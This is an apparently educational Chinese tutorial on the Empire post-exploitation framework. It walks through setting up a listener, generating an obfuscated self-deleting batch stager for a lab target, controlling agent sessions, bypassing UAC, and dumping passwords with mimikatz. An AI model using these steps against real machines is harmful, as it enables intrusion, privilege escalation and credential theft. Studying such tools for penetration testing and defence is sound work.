empire的基礎操作
目錄
1. 建立監聽器
2. 設定stagers
3. 用戶互動
4. 提權
1. 建立監聽器
help 查看幫助命令

listeners 查看監聽器

uselistener xxx 使用監聽器模塊
常用的監聽模塊:http
按兩次tab鍵查看能使用的監聽器模塊


info 查看引數資訊

設定引數
set Name xxx
![]()
set Host http://xxx

set Port xxx
![]()

執行:execute

main 回傳主選單
這邊顯示目前有一個活躍的監聽器

2. 設定stagers
usestagers xxx 使用stager模塊
常用的模塊:windows/hta、windows/launcher_bat
按兩次tab鍵查看能使用的stager模塊


info 查看要設定的引數

set Listener xx 設定監聽器
![]()
set OutFile /var/www/html/launcher.bat 設定檔案生成路勁
![]()
delete 木馬運行完是否自動洗掉
Obfuscate(混淆)

execute 執行

在靶機上雙擊bat檔案成功反彈會話

3. 用戶互動
agents 切換到用戶串列

list 列出用戶

rename 修改用戶ID的名字

interact 進入到用戶互動界面

sysinfo 查看系統資訊

sc 截屏


searchmodule 搜索模塊

shell + command 執行命令

spawn 遷移到新的用戶需要指定監聽器的名字


產生了一個新的會話

用戶清除:
kill agents | all

監聽器清除:
kill listener | all

4. 提權
bypassuac <listener> bypassuac繞過uac提權

可以看到產生了一個帶*的會話,提權成功用戶名前面會多一個*號

mimikatz 在擁有權限后可以利用mimikatz獲取用戶賬號密碼

creds 以串列的形式顯示mimikatz獲取的賬號密碼

uac提權(需要手動確認)
searchmodule ask 搜索ask模塊

usemodule privesc/ask 使用privesc/ask模塊

info 查看所需引數

設定監聽器
![]()
run 執行

靶機彈出uac認證框

串列中產生新的管理員會話

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/215404.html
標籤:其他
上一篇:內網滲透 day13-漏洞復現
